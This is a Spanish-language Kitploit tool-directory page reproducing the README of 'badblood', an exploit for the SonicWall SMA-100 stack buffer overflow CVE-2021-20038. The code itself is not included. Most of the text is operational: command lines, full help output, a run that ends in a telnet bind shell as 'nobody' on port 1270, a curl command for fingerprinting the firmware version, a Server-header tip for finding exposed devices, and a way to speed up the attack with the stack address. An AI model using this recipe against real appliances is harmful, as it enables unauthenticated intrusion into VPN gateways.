Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
badblood — # Exploit de RCE sin autenticación en SonicWall SMA-100 (CVE-2021-20038) | Kitploit
Herramientas/GitHubGitHub/jbaines-r7/badblood
ExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso RemotoExplotación de Binarios
GitHubjbaines-r7/badblood

badblood

# Exploit de RCE sin autenticación en SonicWall SMA-100 (CVE-2021-20038)

Ver Repositorio
952210hace 4 añosRevisado por Kitploit
Sitio web

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Bad Blood

Bad Blood es un exploit para CVE-2021-20038, un desbordamiento de búfer basado en pila en el binario httpd de los sistemas de la serie SMA-100 que utilizan versiones de firmware 10.2.1.x. He escrito muchos de los detalles técnicos aquí:

  • AttackerKB CVE-2021-20038

El exploit, tal como está escrito, abrirá un shell bind de telnet en el puerto 1270. Un atacante que se conecte al shell logrará ejecución como nobody.

Ejemplo de Salida```

albinolobster@ubuntu:/badblood$ date Mon Jan 10 01:15:12 PM PST 2022 albinolobster@ubuntu:/badblood$ python3 badblood.py --rhost 10.0.0.7 --lhost 10.0.0.3 --rversion 10.2.1.2-24sv

▄▄▄▄ ▄▄▄ ▓█████▄ ▄▄▄▄ ██▓ ▒█████ ▒█████ ▓█████▄
▓█████▄ ▒████▄ ▒██▀ ██▌ ▓█████▄ ▓██▒ ▒██▒ ██▒▒██▒ ██▒▒██▀ ██▌
▒██▒ ▄██▒██ ▀█▄ ░██ █▌ ▒██▒ ▄██▒██░ ▒██░ ██▒▒██░ ██▒░██ █▌ ▒██░█▀ ░██▄▄▄▄██ ░▓█▄ ▌ ▒██░█▀ ▒██░ ▒██ ██░▒██ ██░░▓█▄ ▌ ░▓█ ▀█▓ ▓█ ▓██▒░▒████▓ ░▓█ ▀█▓░██████▒░ ████▓▒░░ ████▓▒░░▒████▓ ░▒▓███▀▒ ▒▒ ▓▒█░ ▒▒▓ ▒ ░▒▓███▀▒░ ▒░▓ ░░ ▒░▒░▒░ ░ ▒░▒░▒░ ▒▒▓ ▒ ▒░▒ ░ ▒ ▒▒ ░ ░ ▒ ▒ ▒░▒ ░ ░ ░ ▒ ░ ░ ▒ ▒░ ░ ▒ ▒░ ░ ▒ ▒
░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ▒ ░ ░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
░ ░ ░ ░

[+] Spinning up HTTP server [+] User did not provide an address. We'll guess it. [+] Generated 2047 base addresses [+] Generated 1046017 total addresses to search [+] Filtering addresses for double visits (thanks awesome payload!) [+] Filtered down to 235533 total addresses to search [+] Crashing all forks to reset stack to a semi-predicatable state [+] Crashing complete. Good job. Let's go do work. [+] Disabling stderr [+] Spawning 4 workers [+] Attempting to exploit the remote server. This might take quite some time. :eek: [%] Addresses Tested: 70% [] Received an HTTP callback from 10.0.0.7 at 10/Jan/2022 14:38:03 [] Now we got bad blood. Hey! 🦞 albinolobster@ubuntu:~/badblood$ telnet 10.0.0.7 1270 Trying 10.0.0.7... Connected to 10.0.0.7. Escape character is '^]'.

bash-4.2$ whoami nobody bash-4.2$ uname -a Linux sslvpn 3.13.3 #1 SMP Tue Oct 12 09:52:15 GMT 2021 i686 i686 i386 GNU/Linux bash-4.2$

## Versiones compatibles

| Versión | Compatible | Probada | Objetivo probado |
| - | - | - | - |
| 10.2.1.2-24sv | Sí | :heavy_check_mark: | SMA 500v ESX |
| 10.2.1.1-19sv | Sí | :heavy_check_mark: | SMA 500v ESX |
| 10.2.1.0-17sv | Sí | :heavy_check_mark: | SMA 500v ESX |

## Uso

Como mínimo, deberás proporcionar:

* rhost: la dirección IP del host remoto
* lhost: la dirección IP del host local
* version: la versión del objetivo.

Consulta las notas de estabilidad para obtener contexto adicional.

Una pregunta obvia es cómo obtener la versión del objetivo. Una simple solicitud `curl` al objetivo revelará que utilizan el número de versión para el versionado de `css` y `js`.```
albinolobster@ubuntu:~$ curl --insecure https://10.0.0.7/cgi-bin/welcome
...
<link href='/swl_login.10.2.1.2-24sv.css' type='text/css' rel='stylesheet'>
<link href='/swl_header.10.2.1.2-24sv.css' type='text/css' rel='stylesheet'>
<link href='/sma_content_overrides.10.2.1.2-24sv.css' type='text/css' rel='stylesheet'>
<link href='/sma_login_overrides.10.2.1.2-24sv.css' type='text/css' rel='stylesheet'>
<link href="/notificationbar.10.2.1.2-24sv.css" type="text/css" rel="stylesheet">
<script src="/js/jquery.10.2.1.2-24sv.js" type="text/javascript" charset="utf-8"></script>

El módulo de Metasploit para CVE-2021-20039 analiza esto, pero no tuve el valor de hacerlo para este exploit. Ten en cuenta que si estás escaneando tu entorno en busca de estas cosas, creo que el "Server: SonicWall SSL-VPN Web Server" es el más fiable. Alrededor de 22k en enero de 2022.

Salida de Ayuda```

albinolobster@ubuntu:~/badblood$ python3 badblood.py --help

▄▄▄▄ ▄▄▄ ▓█████▄ ▄▄▄▄ ██▓ ▒█████ ▒█████ ▓█████▄
▓█████▄ ▒████▄ ▒██▀ ██▌ ▓█████▄ ▓██▒ ▒██▒ ██▒▒██▒ ██▒▒██▀ ██▌
▒██▒ ▄██▒██ ▀█▄ ░██ █▌ ▒██▒ ▄██▒██░ ▒██░ ██▒▒██░ ██▒░██ █▌ ▒██░█▀ ░██▄▄▄▄██ ░▓█▄ ▌ ▒██░█▀ ▒██░ ▒██ ██░▒██ ██░░▓█▄ ▌ ░▓█ ▀█▓ ▓█ ▓██▒░▒████▓ ░▓█ ▀█▓░██████▒░ ████▓▒░░ ████▓▒░░▒████▓ ░▒▓███▀▒ ▒▒ ▓▒█░ ▒▒▓ ▒ ░▒▓███▀▒░ ▒░▓ ░░ ▒░▒░▒░ ░ ▒░▒░▒░ ▒▒▓ ▒ ▒░▒ ░ ▒ ▒▒ ░ ░ ▒ ▒ ▒░▒ ░ ░ ░ ▒ ░ ░ ▒ ▒░ ░ ▒ ▒░ ░ ▒ ▒
░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ▒ ░ ░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
░ ░ ░ ░

usage: badblood.py [-h] --rhost RHOST [--rport RPORT] --lhost LHOST [--rversion RVERSION] [--rhostname RHOSTNAME] [--supported-versions] [--workers WORKERS] [--nocrash] [--enable-stderr] [--addr ADDR] [--top-addr TOP_ADDR]

SonicWall SMA-100 Series Stack-Buffer Overflow Exploit (CVE-2021-20038)

optional arguments: -h, --help show this help message and exit --supported-versions The list of supported SMA-100 versions --workers WORKERS The number of workers to spew the exploit --nocrash Stops the exploit from sending a series of crash payload to start --enable-stderr Enable stderr for debugging --addr ADDR Test only. If you know the crash address, go wild. --top-addr TOP_ADDR Test only. If you know the stack's top address, go wild.

required arguments: --rhost RHOST The IPv4 address to connect to --rport RPORT The port to connect to --lhost LHOST The address to connect back to --rversion RVERSION The version of the remote target --rhostname RHOSTNAME The hostname of the remote target target

### --addr vs. --top-addr vs. sin opción

Hay tres modos principales de operación. El primero es el modo esperado (adivinación de direcciones). Los otros dos son principalmente para fines de prueba.

#### ¡No conozco ninguna dirección!

Este es el estado predeterminado y ¡no hay problema! Simplemente adivinaremos mucho.

#### ¡Conozco la dirección de la parte superior de la pila!

¡Genial! Si puedes hacer cat a maps o hacer algo de otra magia:```
bfa29000-bfa4a000 rw-p 00000000 00:00 0          [stack]

¡Puedes usar el parámetro --top_addr y reducir el tiempo de ataque a unos pocos segundos!``` albinolobster@ubuntu:/badblood$ date Mon Jan 10 05:42:19 PM PST 2022 albinolobster@ubuntu:/badblood$ python3 badblood.py --rhost 10.0.0.7 --lhost 10.0.0.3 --rversion 10.2.1.2-24sv --top-addr 3215237120

▄▄▄▄ ▄▄▄ ▓█████▄ ▄▄▄▄ ██▓ ▒█████ ▒█████ ▓█████▄
▓█████▄ ▒████▄ ▒██▀ ██▌ ▓█████▄ ▓██▒ ▒██▒ ██▒▒██▒ ██▒▒██▀ ██▌
▒██▒ ▄██▒██ ▀█▄ ░██ █▌ ▒██▒ ▄██▒██░ ▒██░ ██▒▒██░ ██▒░██ █▌ ▒██░█▀ ░██▄▄▄▄██ ░▓█▄ ▌ ▒██░█▀ ▒██░ ▒██ ██░▒██ ██░░▓█▄ ▌ ░▓█ ▀█▓ ▓█ ▓██▒░▒████▓ ░▓█ ▀█▓░██████▒░ ████▓▒░░ ████▓▒░░▒████▓ ░▒▓███▀▒ ▒▒ ▓▒█░ ▒▒▓ ▒ ░▒▓███▀▒░ ▒░▓ ░░ ▒░▒░▒░ ░ ▒░▒░▒░ ▒▒▓ ▒ ▒░▒ ░ ▒ ▒▒ ░ ░ ▒ ▒ ▒░▒ ░ ░ ░ ▒ ░ ░ ▒ ▒░ ░ ▒ ▒░ ░ ▒ ▒
░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ▒ ░ ░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
░ ░ ░ ░

Descargar herramienta